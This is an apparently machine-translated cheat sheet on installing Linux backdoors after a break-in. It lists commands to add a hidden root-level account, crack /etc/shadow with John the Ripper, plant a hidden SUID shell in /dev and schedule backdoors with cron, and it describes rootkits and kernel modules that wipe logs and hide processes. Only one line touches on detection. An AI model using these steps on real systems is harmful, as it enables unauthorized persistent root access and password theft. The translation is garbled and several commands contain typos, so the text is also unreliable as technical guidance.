Linux backdoor knowledge

 

Common basic editing commands:

 

Sed's/src/dst/'file replacement content

Sed '1, 5d 'file deletes a row

Wc-l file: calculates the number of lines in a file.

 

1. Add a Super User Account

Useradd-o-u 0-p "Linux encrypted password" imiyoo

Echo "imiyoo: x: 0: 0: // bin/sh">/ets/passwd

2. Crack the root user password

./John/etc/shadow-show

./John-wordlist = passwd. lst/etc/shadow

3 place SUID Shell

Cp/bin/bash/dev/. rootshell

Chmod a + s/dev/. rootshell // grant suid permission to the program owner

4 Crontab scheduled task

Use the Crontab program to schedule the timed running of installed backdoor programs

Crontab file content format description:

* *** Command

Hour, day, month, and week commands

The 1st column indicates minute 1 ~ 59. Each minute is represented by * or */1.

The first column indicates the hour 1 ~ 23 (0 indicates 0 points)

The 3rd column indicates the date 1 ~ 31

The 4th column indicates the month 1 ~ 12

The Identification Number of column 5th is from day of the week to day ~ 6 (0 indicates Sunday)

6th columns of commands to run

',' Indicates the separation of time, which is composed of multiple time points; '*/6' indicates that the execution is cyclically executed every six units; '-' indicates all the time from a start point to the end point.

The cron service reads not only all files in/var/spool/cron every minute, but also/etc/crontab once. Therefore, we can use this file to configure

The cron service does something. Crontab configuration is intended for a user, and editing/etc/crontab is a system task.

/Sbin/service crond start // start the service

/Sbin/service crond stop // close the service

/Sbin/service crond restart // restart the service

/Sbin/service crond reload // reload the configuration

You can also enable the service automatically when the system starts:

Add:

/Sbin/service crond start

Crontab-l list the current crontab of the current user

5 toolkit Rootkit

Includes a series of system and backdoor tools:

-Clear logon records in logs

-Camouflage checksum

-Replacing netstat, ps, and other network tools

-The backdoor logon program is easy to install and use.

6. loadable kernel module (LKM)

LKM: Loadable Kernel Modules dynamic loading without re-compiling the Kernel.

Intercepts system calls and provides powerful functions such as hiding directories, files, processes, and network connections.

It is easy to discover and conceal itself. The famous LKM packages include adore and knark.

Backdoor Detection

Use Tripwire or md5 verification to check the system. The IDS system monitors suspicious network connections on the target machine.

7. view the release version of Linux

Cat/etc/issue